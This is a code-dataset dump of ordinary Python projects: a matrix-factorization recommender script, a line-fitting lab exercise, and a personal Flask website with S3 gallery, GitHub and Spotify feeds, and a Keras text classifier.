list_ij = copy.deepcopy(obs)\n        random.shuffle(list_ij)\n\n        # For each coordinate in the shuffled list\n        for i,j in list_ij:\n            # Calculate the partial gradients (da_i and db_j hold the\n            # negative gradients of the offsets, i.e. 2 * error)\n            du_i = lmb * new_U[i, :] - \\\n                (Y[i, j] - np.dot(new_U[i, :].T, new_V[j, :]) - a[i] - b[j]) \\\n                * new_V[j, :] * 2\n            dv_j = lmb * new_V[j, :] - \\\n                (Y[i, j] - np.dot(new_U[i, :].T, new_V[j, :]) - a[i] - b[j]) \\\n                * new_U[i, :] * 2\n            da_i = 2 * Y[i, j] - 2 * np.dot(U[i, :].T, new_V[j, :]) \\\n                - 2 * a[i] - 2 * b[j]\n            db_j = 2 * Y[i, j] - 2 * np.dot(U[i, :].T, new_V[j, :]) \\\n                - 2 * a[i] - 2 * b[j]\n\n            # Update new_U, new_V, new_a, new_b\n            new_U[i, :] -= rate * du_i\n            new_V[j, :] -= rate * dv_j\n            new_a[i] += rate * da_i\n            new_b[j] += rate * db_j\n\n        # Update learning rate\n        rate *= decay\n\ndef err(Y, Ypred, obs):\n    '''Calculates the absolute error rate of the prediction matrix.\n    \n    Args:\n        Y: the original rating matrix\n        Ypred: the predicted rating matrix\n        obs: the list of observed rating coordinates\n    \n    Returns:\n        the average absolute error (abs(value - pred)) for each observed entry.\n    '''\n    \n    sum = 0.0\n    for i, j in obs:\n        sum += np.abs(Y[i, j] - Ypred[i, j])\n    return sum / len(obs)\n\ndef estimate(U, V, a, b, M, N):\n    '''Calculates the predicted ratings matrix\n    \n    
Args:\n        U: latent factor matrix for users\n        V: latent factor matrix for movies\n        a: offset vector for users\n        b: offset vector for movies\n        M: number of users\n        N: number of movies\n    \n    Returns:\n        Predicted rating matrix\n    '''\n    \n    return np.dot(U, V.T) + np.array([a] * N).T + np.array([b] * M)\n\n\nif __name__ == '__main__':\n    # First read from file\n    movies, mid_2_name, mid_2_col = readMovie()\n    Y, uid_2_row, obs = readUser(mid_2_col)\n    \n    # Number of movies\n    N = len(mid_2_col)\n    # Number of users\n    M = len(uid_2_row)\n    # Number of latent factors\n    K = 20\n    \n    # Runs matrix factorization\n    U, V, a, b = sgd(Y, M, N, K, obs)\n    # Saves the matrices to file\n    saveUVab('UV.pk', U, V, a, b)\n    \n    # Predicts the rating matrix, and prints out the error rate\n    YY = estimate(U, V, a, b, M, N)\n    print err(Y, YY, obs)\n\n    # Performs SVD on V and U\n    tsvd, VP, UP = svd2d(V, U)\n\n    # Do some customized data analysis and visualization" } ]
1
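The `sgd` routine in `main.py` above fits the biased factorization Y[i, j] ≈ U[i]·V[j] + a[i] + b[j]. A minimal standalone sketch of one update for a single observed rating (not the repository's code; it assumes the same 2·error gradients with L2 regularization on the factors only):

```python
import numpy as np

def sgd_step(Y, U, V, a, b, i, j, lmb=0.001, rate=0.001):
    # Residual of the current prediction for the observed rating (i, j).
    err = Y[i, j] - np.dot(U[i], V[j]) - a[i] - b[j]
    # Descent directions, computed before any update is applied:
    # regularized for the factors, plain for the offsets.
    du = 2 * err * V[j] - lmb * U[i]
    dv = 2 * err * U[i] - lmb * V[j]
    U[i] += rate * du
    V[j] += rate * dv
    a[i] += rate * 2 * err
    b[j] += rate * 2 * err
```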
sujeetamberkar/Plot_graph_Using_XYValues
https://github.com/sujeetamberkar/Plot_graph_Using_XYValues
5ee075c1a03437d5a10ba1848a06ea20af5e3a97
2fba579e7762a781dd6ec3eba55feb6c8b651a6a
67fef4f91f77c02004d1db14f1d4f1638b85e813
refs/heads/main
2023-06-11T04:41:41.748646
2021-07-05T22:24:57
2021-07-05T22:24:57
383,273,282
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6132686138153076, "alphanum_fraction": 0.6294498443603516, "avg_line_length": 16.685714721679688, "blob_id": "5faf5d09ddadad58cebd864852cb4b1566516003", "content_id": "377948be8cf6fc8f8e5299dd32b5b8d135886182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 618, "license_type": "no_license", "max_line_length": 43, "num_lines": 35, "path": "/lab01.py", "repo_name": "sujeetamberkar/Plot_graph_Using_XYValues", "src_encoding": "UTF-8", "text": "#You Need to install \n\t#pip install numpy\n\t#https://numpy.org/install/\n\n\t#pip install matplotlib\nimport numpy as np\nimport matplotlib.pyplot as plt\nw = 4\nh = 3\nd = 400\nx_List=[]\ny_List=[]\nn= int (input (\"Enter the No of data\"))\nprint(\"\\n\\n X axis Input \\n\\n\\n\")\nfor i in range (0,n):\n\tele=input()\n\tx_List.append(ele)\n\n\n\nprint(\"\\n\\n\\n Y axis input \\n\\n\")\nfor i in range (0,n):\n\tyinput=input()\n\ty_List.append(yinput)\n\n\n\nx=np.array(x_List)\ny=np.array(y_List)\nm,c=np.polyfit(x,y,1)\n#print(\"Y = \",round(m,4) ,\"X +\",round(c,4))\nprint(\"Y = \",m ,\"X +\",c)\nplt.figure(figsize=(w, h), dpi=d)\nplt.plot(x, y)\nplt.savefig(\"out.png\")" } ]
1
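`lab01.py` above reads X/Y values and fits a straight line with `np.polyfit`; here is a quick non-interactive check of the same call (the sample values are made up):

```python
import numpy as np

x = np.array([1.0, 2.0, 3.0, 4.0])
y = np.array([2.1, 3.9, 6.2, 8.1])
m, c = np.polyfit(x, y, 1)  # degree-1 least-squares fit: y ~= m*x + c
print("Y =", m, "X +", c)   # slope ~= 2.03, intercept ~= 0.0
```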
abalarin/PersonalSite
https://github.com/abalarin/PersonalSite
44bfc9c747fa5869f7189a5b8fd9c5aaf1a989b9
be52d07067c6e9626c9c851bc8c54945e388864c
5da0748c7c39e1f99f89bfc876c9416cd07bf551
refs/heads/master
2021-01-11T02:05:21.353301
2019-11-13T22:20:45
2019-11-13T22:20:45
70,830,357
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5895445346832275, "alphanum_fraction": 0.5916149020195007, "avg_line_length": 25.46575355529785, "blob_id": "5856a9e942a0156faa4615d3be62ed2d868fa40b", "content_id": "011264a963614a54ae223c835e28fac4a07f6092", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1932, "license_type": "no_license", "max_line_length": 108, "num_lines": 73, "path": "/austin/endpoints/gallery/utils.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import jsonify\n\nfrom austin import client\n\n\ndef create_album(name):\n client.create_bucket(Bucket=name)\n\n\ndef list_albums():\n return client.list_buckets()['Buckets']\n\n\ndef list_images(album):\n objects = []\n for key in client.list_objects(Bucket=album)['Contents']:\n objects.append(key['Key'])\n\n return objects\n\n\ndef add_image(permisson, album, file_object, filename):\n client.put_object(ACL=permisson, Body=file_object, Bucket=album, Key=filename, ContentType='image/jpeg')\n\n\ndef get_URL(file_name):\n return client.generate_presigned_post(Bucket='austin', Key=file_name)\n\n\ndef get_albums():\n try:\n\n result = client.list_objects(Bucket='austin', Prefix='albums/', Delimiter='/')\n album_names = []\n for object in result.get('CommonPrefixes'):\n album_names.append(object['Prefix'][6:].strip('/'))\n\n albums = []\n for album_name in album_names:\n album = {\n 'Name': album_name,\n 'images': get_images(album_name)\n }\n albums.append(album)\n\n return albums\n\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\ndef get_images(album):\n try:\n\n prefix = 'albums/' + str(album) + '/'\n result = client.list_objects(Bucket='austin', Prefix=prefix, Delimiter='/')\n\n image_urls = []\n skipthedir = 0 # becuase the directory itself is also retrived we want to skip it\n for object in result.get('Contents'):\n if skipthedir > 0:\n url = get_URL(object.get('Key'))\n image_urls.append(url.get('url') + '/' + url.get('fields')['key'])\n else:\n skipthedir += 1\n\n return image_urls\n\n\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n" }, { "alpha_fraction": 0.511049747467041, "alphanum_fraction": 0.5165745615959167, "avg_line_length": 18.052631378173828, "blob_id": "a3b3778bfd0a9aaed946bf683f88565cf15021c8", "content_id": "ebb94712ac4d95bd02b621b9c09fb1ee5fa6636b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "no_license", "max_line_length": 30, "num_lines": 19, "path": "/setup.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\nsetup(\n name='austin',\n packages=['austin'],\n include_package_data=True,\n install_requires=[\n 'flask',\n 'flask-sqlalchemy',\n 'flask-security',\n 'psycopg2-binary',\n 'configparser',\n 'requests',\n 'boto3',\n 'tensorflow',\n 'markdown',\n 'medium',\n ]\n)\n" }, { "alpha_fraction": 0.5627472400665283, "alphanum_fraction": 0.5800071954727173, "avg_line_length": 33.33333206176758, "blob_id": "b0d5bdaf985b61977ca28b172fcfc07a93106b4d", "content_id": "b11b4ae4c3a652932b4e4b1770bbe7ff7a7aa83b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2781, "license_type": "no_license", "max_line_length": 78, "num_lines": 81, "path": "/austin/endpoints/main/github.py", "repo_name": 
"abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import jsonify\nfrom dateutil import parser, tz\nimport datetime\nimport requests\n\nfrom austin import Config\n\n\ndef date_convert(date_time):\n\n # This assumes datetime is coming from Zulu/UTC zone & convert to EST\n from_zone = tz.gettz('UTC')\n to_zone = tz.gettz('America/New_York')\n\n # Get Current Time\n time_now = datetime.datetime.now()\n\n # Parse given time into datetime type, convert to EST time\n old_time = parser.parse(date_time)\n old_time = old_time.replace(tzinfo=from_zone).astimezone(to_zone)\n\n # Remove the timezone awareness to calculate time difference\n old_time = old_time.replace(tzinfo=None)\n time_difference = (time_now - old_time).total_seconds()\n\n if time_difference < 60:\n return(str(int(time_difference)) + \" seconds ago\")\n\n elif time_difference < 3600:\n if time_difference < 120:\n return(str(int(time_difference / 60)) + \" minute ago\")\n else:\n return(str(int(time_difference / 60)) + \" minutes ago\")\n\n elif time_difference < 86400:\n if time_difference < 7200:\n return(str(int((time_difference / 60) / 60)) + \" hour ago\")\n else:\n return(str(int((time_difference / 60) / 60)) + \" hours ago\")\n else:\n if time_difference < 172800:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" day ago\")\n else:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" days ago\")\n\n return dict(date_convert)\n\n\ndef github_feed(limit):\n \"\"\" Return # of the most recent Github Actions \"\"\"\n\n url = 'https://api.github.com/users/abalarin/events/public'\n token = '?access_token=' + Config.GITHUB_TOKEN\n\n github_resp = requests.get(url + token + '&per_page=' + str(limit)).json()\n\n # print(github_resp)\n for event in github_resp:\n if event['type'] == 'WatchEvent':\n event['type'] = ' is watching'\n if event['type'] == 'ForkEvent':\n event['type'] = ' forked'\n if event['type'] == 'PushEvent':\n event['type'] = ' pushed to'\n if event['type'] == 'PullRequestEvent':\n event['type'] = ' pulled from'\n if event['type'] == 'CreateEvent':\n event['type'] = ' created repo'\n if event['type'] == 'DeleteEvent':\n event['type'] = ' deleted repo'\n if event['type'] == 'IssueCommentEvent':\n event['type'] = ' commented on'\n if event['type'] == 'IssuesEvent':\n if event['payload']['action'] == 'closed':\n event['type'] = 'closed out an issue on'\n elif event['payload']['action'] == 'opened':\n event['type'] = 'opened an issue on '\n\n event['created_at'] = date_convert(event['created_at'])\n\n return github_resp\n" }, { "alpha_fraction": 0.6150121092796326, "alphanum_fraction": 0.6513317227363586, "avg_line_length": 30.769229888916016, "blob_id": "2f687500c58bf4a5621555c0369bbf07f5a57939", "content_id": "79407b6c46403cf967d586a3b69d75ec751edafc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 53, "num_lines": 13, "path": "/austin/models/site_models.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from austin import db\n\n\nclass Configuration(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(120))\n spotify_code = db.Column(db.String(256))\n spotify_access_token = db.Column(db.String(256))\n spotify_refresh_token = db.Column(db.String(256))\n snap_client_id = db.Column(db.String(256))\n\n def __repr__(self):\n return(str(self.id) + \", \" + self.name)\n" }, { "alpha_fraction": 0.6772334575653076, 
"alphanum_fraction": 0.6785142421722412, "avg_line_length": 33.31867980957031, "blob_id": "a4e0adbd3d2ffe8160837eb341d740b5a3dbd4c8", "content_id": "513bbcbfa1bbf92477d2444ef7ea78ca7de2e044", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3123, "license_type": "no_license", "max_line_length": 93, "num_lines": 91, "path": "/austin/endpoints/main/spotify.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "import json\nimport requests\n\nfrom austin.models.site_models import Configuration\nfrom austin import Config, db\n\n\ndef authenticate_spotify():\n \"\"\" Gets new spotify bearer token \"\"\"\n\n config = Configuration.query.get(1)\n\n # Build out spotify authentication POST\n grant_type = \"grant_type=authorization_code\"\n code = \"&code=\" + config.spotify_code\n redirect_uri = \"&redirect_uri=\" + Config.SPOTIFY_REDIRECT\n client_id = \"&client_id=\" + Config.SPOTIFY_ID\n client_secret = \"&client_secret=\" + Config.SPOTIFY_SECRET\n\n payload = grant_type + code + redirect_uri + client_id + client_secret\n\n headers = {'Content-Type': \"application/x-www-form-urlencoded\"}\n url = 'https://accounts.spotify.com/api/token'\n\n # Once authenticated, Bearer Token will be returned for User data access\n response = requests.post(url, data=payload, headers=headers)\n access_token = json.loads(response.text)['access_token']\n refresh_token = json.loads(response.text)['refresh_token']\n\n # Update Site Configuration Table with Spotify Bearer Token\n config.spotify_access_token = access_token\n config.spotify_refresh_token = refresh_token\n db.session.commit()\n\n\ndef reauth_spotify():\n \"\"\" Get a new Spotify access token with the Refresh token \"\"\"\n\n config = Configuration.query.get(1)\n\n # Build out spotify authentication POST\n grant_type = \"grant_type=refresh_token\"\n refresh_token = \"&refresh_token=\" + config.spotify_refresh_token\n client_id = \"&client_id=\" + Config.SPOTIFY_ID\n client_secret = \"&client_secret=\" + Config.SPOTIFY_SECRET\n\n payload = grant_type + refresh_token + client_id + client_secret\n\n headers = {'Content-Type': \"application/x-www-form-urlencoded\"}\n url = 'https://accounts.spotify.com/api/token'\n\n # Once authenticated, Bearer Token will be returned for User data access\n response = requests.post(url, data=payload, headers=headers)\n access_token = json.loads(response.text)['access_token']\n\n # Update Site Configuration Table with Spotify Bearer Token\n config.spotify_access_token = access_token\n db.session.commit()\n return access_token\n\n\ndef spotify_feed(limit):\n \"\"\" Return # of the most recent Spotify Songs Played \"\"\"\n\n url = \"https://api.spotify.com/v1/me/player/recently-played\"\n querystring = {\"limit\": str(limit)}\n\n headers = {\n 'Authorization': \"Bearer \" + Configuration.query.get(1).spotify_access_token\n }\n\n response = requests.get(url, data=\"\", headers=headers, params=querystring)\n response = json.loads(response.text)\n\n # Check if the Access Token is not expired, if not KeyError will be thrown\n try:\n if response['error']:\n headers = {\n 'Authorization': \"Bearer \" + reauth_spotify()\n }\n\n response = requests.get(\n url, data=\"\", headers=headers, params=querystring)\n response = json.loads(response.text)\n return response\n\n # If Key Error is thrown then there was no error in get request, return original response\n except KeyError:\n return response\n\n return response\n" }, { "alpha_fraction": 0.739234447479248, 
"alphanum_fraction": 0.7583732008934021, "avg_line_length": 23.58823585510254, "blob_id": "1e6556c252a8104832ec31215cd957e404bedd44", "content_id": "5b64cd7950863ebc5cca4f625df0c78ac4c84d4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 418, "license_type": "no_license", "max_line_length": 77, "num_lines": 17, "path": "/README.md", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "# [PersonalSite](https://austinbalarin.com)\nMy Personal Web App\n\n## A Flask App blog using Linodes Object Storage!\n#### Other things being used\n- Flask-SQLAlchemy\n- Flask-Security\n- boto3\n\n# This app is using Python3\nWhen installing gunicorn make sure its with python3\n```\npip3 install gunicorn\n\n# Update alts to use python3 by default\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10\n```\n" }, { "alpha_fraction": 0.4597014784812927, "alphanum_fraction": 0.46791043877601624, "avg_line_length": 32.5, "blob_id": "45d9ae72b315efbf7999c39f33a390005f6158c9", "content_id": "0e893dd0454ac983f7294d7a2cc2d8dcab1db60f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1340, "license_type": "no_license", "max_line_length": 114, "num_lines": 40, "path": "/austin/templates/includes/_spotify.html", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "<div class=\"container\">\n <div class=\"row\">\n {% for item in recently_played['items'] %}\n <div class=\"card container-fluid border rounded-0\">\n <div class=\"row no-gutters\">\n <div class=\"col avatar\">\n <img id=\"github_avatar\" src=\"{{item['track']['album']['images'][0]['url']}}\" alt=\"\">\n </div>\n <div class=\"col-md-8\">\n <div class=\"card-body\">\n <h5>\n {% set uri = item['track']['external_urls']['spotify'] %}\n <a onclick=\"hide_redirect_newwindow('{{uri}}')\">\n <span class=\"a-link\">{{item['track']['name']}}</span>\n </a>\n </h5>\n <h6>\n {% set uri = item['track']['album']['artists'][0]['external_urls']['spotify'] %}\n <a onclick=\"hide_redirect_newwindow('{{uri}}')\">\n <span class=\"a-link\">{{item['track']['album']['artists'][0]['name']}}</span>\n </a>\n </h6>\n\n <p class=\"card-text\"><small class=\"text-muted\">Listend {{date_convert(item['played_at'])}}</small></p>\n </div>\n </div>\n </div>\n </div>\n {% endfor %}\n\n </div>\n\n <div class=\"text-center\">\n <h4 class=\"text-center\">\n <a onclick=\"hide_redirect('/music')\">\n <span class=\"a-link\">See More...</span>\n </a>\n </h4>\n </div>\n</div>\n" }, { "alpha_fraction": 0.6778523325920105, "alphanum_fraction": 0.6939597129821777, "avg_line_length": 32.8636360168457, "blob_id": "76ee4b3b4f59dfabc733ea350da84d080a6e3987", "content_id": "c13ddbcce5a1ef7d62838037b490e2cc29e4ab3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 69, "num_lines": 22, "path": "/austin/models/user_models.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from sqlalchemy.sql import func\nfrom flask_login import UserMixin\nfrom austin import db, login_manager\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass User(db.Model, UserMixin):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(120), nullable=False)\n username = db.Column(db.String(120), unique=True, nullable=False)\n email = 
db.Column(db.String(120), unique=True, nullable=False)\n password = db.Column(db.String(100), nullable=False)\n admin = db.Column(db.Boolean, default=False)\n register_date = db.Column(db.DateTime(\n timezone=True), server_default=func.now())\n\n def __repr__(self):\n return(self.username + \", \" + self.email)\n" }, { "alpha_fraction": 0.6337916254997253, "alphanum_fraction": 0.6538868546485901, "avg_line_length": 29.256000518798828, "blob_id": "f01534b832e82fd21827a392fbef4dac522016bc", "content_id": "158f07c2c7394f1e27927b95ba5e0629adefb0c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3782, "license_type": "no_license", "max_line_length": 137, "num_lines": 125, "path": "/austin/endpoints/main/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from urllib.parse import urlparse\n\nfrom flask import Blueprint, render_template, redirect, request, url_for, jsonify\nfrom flask_login import login_required\n\nfrom dateutil import parser, tz\nimport datetime\nimport requests\n\n# Home built Imports\nfrom austin.endpoints.gallery.utils import get_albums\nfrom .spotify import spotify_feed, authenticate_spotify\nfrom .github import github_feed\nfrom austin.models.site_models import Configuration\nfrom austin import Config, db\n\nmain = Blueprint('main', __name__)\n\n\[email protected]('/')\ndef index():\n snap_id = Configuration.query.get(1).snap_client_id\n return render_template('index.html', albums=get_albums(), changelog=github_feed(5), recently_played=spotify_feed(5), snap_id=snap_id)\n\n\[email protected]('/changelog')\ndef change_log():\n return render_template('activity/github.html')\n\[email protected]('/githubjson/<count>')\ndef githubjson(count):\n return jsonify(github_feed(count))\n\n\[email protected]('/music')\ndef music():\n return render_template('activity/spotify.html', recently_played=spotify_feed(50))\n\n\[email protected]('/spotify')\n@login_required\ndef spotify():\n payload = {\n 'response_type': 'code',\n 'client_id': Config.SPOTIFY_ID,\n 'redirect_uri': Config.SPOTIFY_REDIRECT,\n 'scope': 'user-read-recently-played',\n 'show_dialog': 'true'\n }\n url = 'https://accounts.spotify.com/authorize'\n response = requests.get(url, params=payload)\n\n return redirect(response.url)\n\n# Spotify redirect callback\[email protected]('/callback/')\ndef callback():\n config = Configuration.query.get(1)\n config.spotify_code = urlparse(request.url).query[5:]\n db.session.commit()\n\n authenticate_spotify()\n\n return redirect(url_for('main.index'))\n\n\[email protected]_errorhandler(401)\[email protected]_errorhandler(403)\[email protected]_errorhandler(404)\[email protected]_errorhandler(405)\[email protected]_errorhandler(500)\ndef error_404(error):\n return render_template('errors/404.html', e=error)\n\n\n# This is too slow - optimize\n# Make this request from the client\[email protected]_processor\ndef jinja_api_caller():\n def get_json_from(url):\n return requests.get(url + '?access_token=' + Config.GITHUB_TOKEN).json()\n return dict(get_json_from=get_json_from)\n\n\n# Date-Time Parser\[email protected]_processor\ndef jinja_time_parser():\n def date_convert(date_time):\n\n # This assumes datetime is coming from Zulu/UTC zone & convert to EST\n from_zone = tz.gettz('UTC')\n to_zone = tz.gettz('America/New_York')\n\n # Get Current Time\n time_now = datetime.datetime.now()\n\n # Parse given time into datetime type, convert to EST time\n old_time = parser.parse(date_time)\n old_time = 
old_time.replace(tzinfo=from_zone).astimezone(to_zone)\n\n # Remove the timezone awareness to calculate time difference\n old_time = old_time.replace(tzinfo=None)\n time_difference = (time_now - old_time).total_seconds()\n\n if time_difference < 60:\n return(str(int(time_difference)) + \" seconds ago\")\n\n elif time_difference < 3600:\n if time_difference < 120:\n return(str(int(time_difference / 60)) + \" minute ago\")\n else:\n return(str(int(time_difference / 60)) + \" minutes ago\")\n\n elif time_difference < 86400:\n if time_difference < 7200:\n return(str(int((time_difference / 60) / 60)) + \" hour ago\")\n else:\n return(str(int((time_difference / 60) / 60)) + \" hours ago\")\n else:\n if time_difference < 172800:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" day ago\")\n else:\n return(str(int(((time_difference / 60) / 60) / 24)) + \" days ago\")\n\n return dict(date_convert=date_convert)\n" }, { "alpha_fraction": 0.6331333518028259, "alphanum_fraction": 0.6365943551063538, "avg_line_length": 30.179855346679688, "blob_id": "91f53ef1da69531aaf4fccf14cc70cb0aaeb4b1b", "content_id": "3cd432c89e53e6bb9d8fc2565de4654a1d8986d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4334, "license_type": "no_license", "max_line_length": 84, "num_lines": 139, "path": "/austin/endpoints/gallery/s3routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "#\n# Not in use: These are some sample endpoints for CRUD functions of object Storage\n#\n\nfrom flask import Blueprint, jsonify, request\n\nfrom austin import client, resource\n\n# BOTO STUFF\nfrom austin.botoConfig.objects import *\n\n\nboto3s = Blueprint('boto3s', __name__)\n\n\[email protected]('/buckets', methods=['GET'])\ndef get_buckets():\n try:\n results = listBuckets(client)\n return jsonify(results)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/buckets', methods=['POST'])\ndef POST_make_bucket():\n try:\n post_values = request.get_json()\n\n name = post_values['bucket_name']\n createBucket(client, name)\n return jsonify({\"result\": \"Bucket created!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>', methods=['GET'])\ndef GET_list_objects(bucket):\n results = listObjects(client, bucket)\n return jsonify(results)\n\n\[email protected]('/objects/<bucket>/<object_file>', methods=['POST'])\ndef POST_add_object(bucket, object_file):\n try:\n files = request.files['file']\n print(files)\n addObject(client, bucket, files, object_file)\n return jsonify({\"result\": \"Object added!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/download/objects/<bucket>/<object_key>', methods=['GET'])\ndef Download_Object(bucket, object_key):\n try:\n object = downloadObject(\n client, bucket, object_key, Config.APP_ROOT + \"/static/images/test.png\")\n return jsonify({\"result\": \"Object Downloaded!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>/<object_key>', methods=['GET'])\ndef Get_Object(bucket, object_key):\n try:\n object = getObject(client, bucket, object_key)\n print(object)\n return jsonify(object['Body'].read())\n # file = 
object['Body'].read()\n # file = open(bytes)\n # return render_template('index.html', file=file)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/objects/<bucket>/<object_key>', methods=['POST'])\ndef change_perms(bucket, object_key):\n try:\n # print(\"WORK\" + ACP['Grants'][0]['Permission'])\n changeObjectPerm(client, bucket, object_key)\n return jsonify({\"result\": \"Object Updated!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/url/<bucket>/<object_id>', methods=['GET'])\ndef geturl(bucket, object_id):\n try:\n object = getURL(client, bucket, object_id)\n return jsonify(object)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/location/<bucket>', methods=['GET'])\ndef getloco(bucket):\n try:\n object = getBucketLocation(client, bucket)\n return jsonify(object)\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/curl/<bucket>', methods=['GET'])\ndef createurl(bucket):\n try:\n createURL(client, bucket)\n return jsonify({\"result\": \"URL Created!\"})\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/bucketperm/<bucket>', methods=['GET'])\ndef getBucketPerms(bucket):\n try:\n return jsonify(bucketPermissions(client, bucket))\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n\n\[email protected]('/bucketperm/<bucket>', methods=['PUT'])\ndef chgBucketPerms(bucket):\n try:\n changeBucketPermissions(resource, bucket)\n return jsonify(bucketPermissions(client, bucket))\n except Exception as e:\n print(e)\n return jsonify({\"error\": \"There was a problem with the data you provided.\"})\n" }, { "alpha_fraction": 0.6886792182922363, "alphanum_fraction": 0.7006860971450806, "avg_line_length": 29.6842098236084, "blob_id": "1a49fbe76208586b102310461fb5861e765e6ea8", "content_id": "8dfec6b14cf26811cdfea7d6b4cea1c7a435485e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1166, "license_type": "no_license", "max_line_length": 129, "num_lines": 38, "path": "/austin/endpoints/machinelearning/routes.py", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "from flask import Blueprint, render_template, redirect, request, url_for\nfrom flask_login import login_required\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport os\n\nfrom .utils import load_md\nfrom .urgency_model import urgency_model\nfrom austin.config import Config\n\nml = Blueprint('ml', __name__)\n\n\[email protected]('/urgency')\ndef index():\n html = load_md(\"urgency.md\")\n return render_template('machinelearning/urgency.html', md=html)\n\n\[email protected]('/classify', methods=['POST'])\ndef classify():\n model = urgency_model(10000)\n filepath = Config.APP_ROOT + \"/models/ml_models/cp.ckpt\"\n model.load_weights(filepath)\n\n text = request.form.get('ticket_body')\n matrix = keras.preprocessing.text.one_hot(text, 10000, filters='!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~\\t\\n', lower=True, split=' ')\n\n matrix = keras.preprocessing.sequence.pad_sequences([matrix], maxlen=500)\n\n # Prediction\n probability = 
model.predict(matrix)\n    prediction_label = probability.argmax(axis=-1)\n    print(prediction_label)\n\n    html = load_md(\"urgency.md\")\n    return render_template('machinelearning/urgency_prediction.html', prediction=prediction_label, md=html)\n" }, { "alpha_fraction": 0.4997677803039551, "alphanum_fraction": 0.5940548181533813, "avg_line_length": 49.069766998291016, "blob_id": "145f50dfba388762ef11efc802086dd01a9ceba7", "content_id": "a9ba81d3dd010a20547200c4f54af5e075d5af4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2153, "license_type": "no_license", "max_line_length": 305, "num_lines": 43, "path": "/austin/static/markdown/urgency.md", "repo_name": "abalarin/PersonalSite", "src_encoding": "UTF-8", "text": "# How Does this Model Work?\n### Layers:\n- One-Hot-Encoding\n- Padding\n- Embedding\n- 1D Convolution\n- Flatten\n- Densely Connected layer 1 of size 250\n- Densely Connected layer 2 of size 1\n\n## One-Hot-Encoding\n> *While this may not technically be considered a Keras layer, a transformation of the original input occurs, and I'm considering it a layer from a practicality standpoint.*\n\nOnce a text body is parsed into an array of size **n** words, i.e. [\"A\", \"Quick\", \"Brown\" ... n], a filter of sorts is applied that maps every word to its respective index in a vocabulary.\n\nAn example conversion for a text with a vocabulary size of 10,000 might look like the following:\n\n1. `\"A quick brown fox jumps over the fence\"`\n2. `[\"A\", \"quick\", \"brown\", \"fox\", \"jumps\", \"over\", \"the\", \"fence\"]`\n3. `[1, 5303, 9410, 9492, 7585, 5776, 520, 3212]`\n\nWhere every word is mapped to an index between 1 and 10,000.\n\n## Padding\n> *Same as one-hot-encoding, this is technically not a Keras layer, but a transformation is performed...*\n\nSince every input might be a different number of words, when we pass it through the convolutional layers of our network (and reduce vector size) we would like to preserve some characteristics of the original pattern of text. We also want to kinda normalize the first convolution by standardizing the input.\n\nSo if we say the padding is the size of the maximum number of words in a 